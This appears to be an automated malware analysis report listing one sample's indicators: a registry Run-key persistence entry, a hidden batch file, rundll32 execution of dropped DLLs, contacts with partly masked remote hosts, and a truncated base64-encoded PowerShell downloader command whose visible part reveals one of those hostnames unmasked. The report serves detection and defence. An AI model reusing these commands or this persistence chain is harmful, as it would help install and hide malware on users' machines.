Technical Information
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'ihalugiyxg.jwp' = '%WINDIR%\SysWOW64\rundll32.exe "%LOCALAPPDATA%\Kavvlphu\ihalugiyxg.jwp",deIGqxm'
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat
- %ALLUSERSPROFILE%\uwdhx.bat
- %ALLUSERSPROFILE%\363477261.dll
- from %ALLUSERSPROFILE%\363477261.dll to %LOCALAPPDATA%\kavvlphu\ihalugiyxg.jwp
- http://al####ebrave.com/wp-content/JgiTtyqRGicpzGAYD/
- 'th####ndskill.com':443
- '17#.#04.227.98':443
- DNS ASK th####ndskill.com
- DNS ASK al####ebrave.com
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc JABzAHQAcgBzAD0AIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAdAByAGUAbgBkAHMAawBpAGwAbAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUASAAxADEALwAsAGgAdAB0AHAAOgAvAC8AYQBsAGkAdAB0AGwAZQBiAHIAYQB2AGUALgBj...
- '%WINDIR%\syswow64\rundll32.exe' %ALLUSERSPROFILE%\363477261.dll,f42749086
- '%WINDIR%\syswow64\rundll32.exe' "%ALLUSERSPROFILE%\363477261.dll",DllRegisterServer
- '%WINDIR%\syswow64\rundll32.exe' "%LOCALAPPDATA%\Kavvlphu\ihalugiyxg.jwp",ghJkWBRIH
- '%WINDIR%\syswow64\rundll32.exe' "%LOCALAPPDATA%\Kavvlphu\ihalugiyxg.jwp",DllRegisterServer